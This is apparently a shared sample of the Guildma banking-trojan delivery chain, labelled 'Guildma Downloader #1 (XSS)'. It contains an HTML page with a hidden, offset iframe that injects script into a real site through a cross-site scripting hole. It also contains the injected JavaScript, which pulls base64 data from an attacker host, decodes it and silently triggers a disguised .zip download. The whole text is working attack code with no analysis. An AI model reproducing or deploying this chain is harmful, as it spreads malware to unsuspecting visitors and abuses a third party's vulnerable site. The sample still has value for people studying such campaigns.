Guildma Downloader #1 (XSS)

1. IFRAME + XSS
2.  
3. <body style="margin:0;padding:0;"><iframe allowtransparency="true" style="position:relative; top: -160px; left: -100px;width:10;height:10" src="https://www.vrandaman.com//Article/tag.php?t=<script src='http://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script><script type="text/javascript" src='http://eraa1d.contsfinas.xyz/jquery.min.php'>IF</script>?">
4.  
5. jquery.min.php
6.  
7. function sbuffers(base64){
8. var binary_string = atob(base64);
9. var len = binary_string.length;
10. var bytes = new Uint8Array(len);for (var i=0;i < len; i++){bytes[i] = binary_string.charCodeAt(i);}
11. return bytes.buffer;}
12. function RicksGutis() {
13. try {
14. var sUrl = "http://eraa1d.contsfinas.xyz/FBZDCLXBV/J66M29MK3X37/65400712/Seu_DocPress825";
15. now = new Date;
16. var Doc = now.getHours() + now.getMinutes() + now.getSeconds() + now.getMilliseconds();
17. var fileName = sUrl.replace(/^.*[\\/]/, "") + Doc + ".zip";
18. $.get( sUrl + "z64y64", function(response){
19. var file = response;
20. var data = sbuffers(file);
21. var blob = new Blob([data],{type: "octet/stream"});
22. if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
23. else{
24. var a = document.createElement("a");
25. document.body.appendChild(a);
26. a.style = "display: none";
27. var url = window.URL.createObjectURL(blob);
28. a.href = url;
29. a.download = fileName;
30. a.click();
31. window.URL.revokeObjectURL(url);
32. window.stop();
33. }
34. }
35. );
36. }
37. catch(err) {
38. setTimeout(RicksGutis, 2000);
39. }
40. }
41. RicksGutis();